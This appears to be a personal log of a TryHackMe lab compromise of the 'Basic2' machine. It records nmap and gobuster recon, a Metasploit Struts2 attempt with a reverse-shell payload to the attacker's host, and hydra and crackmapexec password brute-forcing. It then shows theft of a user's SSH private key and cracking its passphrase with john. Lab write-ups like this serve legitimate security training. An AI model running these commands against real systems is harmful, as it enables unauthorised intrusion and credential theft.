sudo openvpn ~/Desktop/tryhackme.ovpn
=================================
10.201.76.77 -- domain.com -- lin x32/x64
=================================
2025-08-01 17:49:58 -- nmap --disable-arp-ping -PS 10.201.76.77
//host up
2025-08-01 17:54:11 -- nmap -sC -sV -O -T4 10.201.76.77
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fe:f4:18:b2:ec:82:dc:a8:d1:92:f0:78:5d:5f:9e:d8 (RSA)
| 256 09:0b:2a:5f:25:30:4d:23:24:60:2c:af:85:31:fe:52 (ECDSA)
|_ 256 5f:3b:af:9f:1a:6d:7c:24:08:73:08:59:99:0a:bb:a5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-08-01T21:54:29
|_ start_date: N/A
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
2025-08-01 17:56:27 -- gobuster dir --wordlist /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt --url 10.201.76.77
//bad command
2025-08-01 18:03:43 -- wget --quiet --output-document=- 10.201.76.77
2025-08-01 18:04:43 -- gobuster dir --threads 20 --wordlist /usr/share/wordlists/dirb/common.txt --url http://10.201.76.77/
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/development (Status: 301) [Size: 318] [--> http://10.201.76.77/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 277]
2025-08-01 18:06:34 -- wget --quiet --output-document=- http://10.201.76.77/development/
===
2018-04-23: I\'ve been messing with that struts stuff, and it\'s pretty cool! I think it might be neat
to host that on this server too. Haven\'t made any real web apps yet, but I have tried that example
you get to show off how it works (and it\'s the REST version of the example!). Oh, and right now I\'m
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
===
For J:
I\'ve been auditing the contents of /etc/shadow to make sure we don\'t have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
===
// very nice
// Struts 2 REST (CVE-2017-9805)
use exploit/multi/http/struts2_rest_xstream
show options
set RHOST 10.201.76.77
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST // already good
set LPORT 31253
2025-08-01 18:14:48 -- run
[-] Exploit failed: linux/x86/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
// failed
set PAYLOAD cmd/unix/reverse
2025-08-01 18:15:27 -- run
[*] Started reverse TCP double handler on 192.168.121.36:31253
[*] Exploit completed, but no session was created.
// no dice
sudo apt install seclists
2025-08-01 18:19:25 -- curl -X POST -H "Content-Type: application/xml" -d '<test/>' http://10.201.76.77/orders/3
<title>404 Not Found</title>
2025-08-01 18:25:17 -- gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt --extensions html,php,txt,json,xml --url http://10.201.76.77
// nada
2025-08-01 18:26:13 -- rerun without extensions
// moving on
2025-08-01 18:29:52 -- nbtscan 10.201.76.77
// nada
2025-08-01 18:30:02 -- nmap -p 137,139,445 --script nbstat,smb-os-discovery,smb-enum-shares,smb-enum-users 10.201.76.77
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
2025-08-01 18:31:17 -- enum4linux 10.201.76.77
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
// here are the users and we know jan has a weak password
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
2025-08-01 19:07:06 -- crackmapexec smb -u jan -p /usr/share/wordlists/rockyou.txt --no-bruteforce 10.201.76.77
SMB 10.201.76.77 445 BASIC2 [*] Windows 6.1 Build 0 (name:BASIC2) (domain:ec2.internal) (signing:False) (SMBv1:False)
SMB 10.201.76.77 445 BASIC2 [+] ec2.internal\jan:123456
2025-08-01 19:08:39 -- crackmapexec smb -u kay -p /usr/share/wordlists/rockyou.txt --no-bruteforce 10.201.76.77
SMB 10.201.76.77 445 BASIC2 [+] ec2.internal\kay:123456
2025-08-01 19:09:41 -- smbclient -L //10.201.76.77/ -U jan
Password for [WORKGROUP\jan]:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.201.76.77 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
2025-08-01 19:11:15 -- hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.76.77
[22][ssh] host: 10.201.76.77 login: jan password: armando
// PASSWORD^^^
2025-08-01 19:16:03 -- hydra -l kay -P /usr/share/wordlists/rockyou.txt ssh://10.201.76.77
2025-08-01 19:13:24 -- smbclient //10.201.76.77/Anonymous -U jan
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
14282840 blocks of size 1024. 6440700 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
===
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it\'s all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
===
2025-08-01 19:25:26 -- sshpass -p "armando" ssh jan@10.201.76.77
// success
//local machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
2025-08-01 19:32:00 -- scp /tmp/linpeas.sh jan@10.201.76.77:/tmp/
chmod +x /tmp/linpeas.sh
2025-08-01 19:33:35 -- /tmp/linpeas.sh 2>&1 | tee /tmp/linpeas-output.txt
scp jan@10.201.76.77:/tmp/linpeas-output.txt ~/
// cool stuff
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/pass.bak
jan@ip-10-201-76-77:~$ ls -la /home/kay/.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
2025-08-01 19:46:58 -- sshpass -p "armando" scp jan@10.201.76.77:/home/kay/.ssh/id_rsa /tmp/TARGET_id_rsa
chmod 600 /tmp/TARGET_id_rsa
2025-08-01 19:47:33 -- ssh -i /tmp/TARGET_id_rsa kay@10.201.76.77
// asked for passphrase... lets try to crack it
2025-08-01 19:49:52 --
ssh2john /tmp/TARGET_id_rsa > /tmp/TARGET_KAY_id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/TARGET_KAY_id_rsa.hash
// winner!
beeswax (/tmp/TARGET_id_rsa)
2025-08-01 19:50:40 -- ssh again w/ SSH keyfile password
kay@ip-10-201-76-77:~$ ls -l
total 4
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
kay@ip-10-201-76-77:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$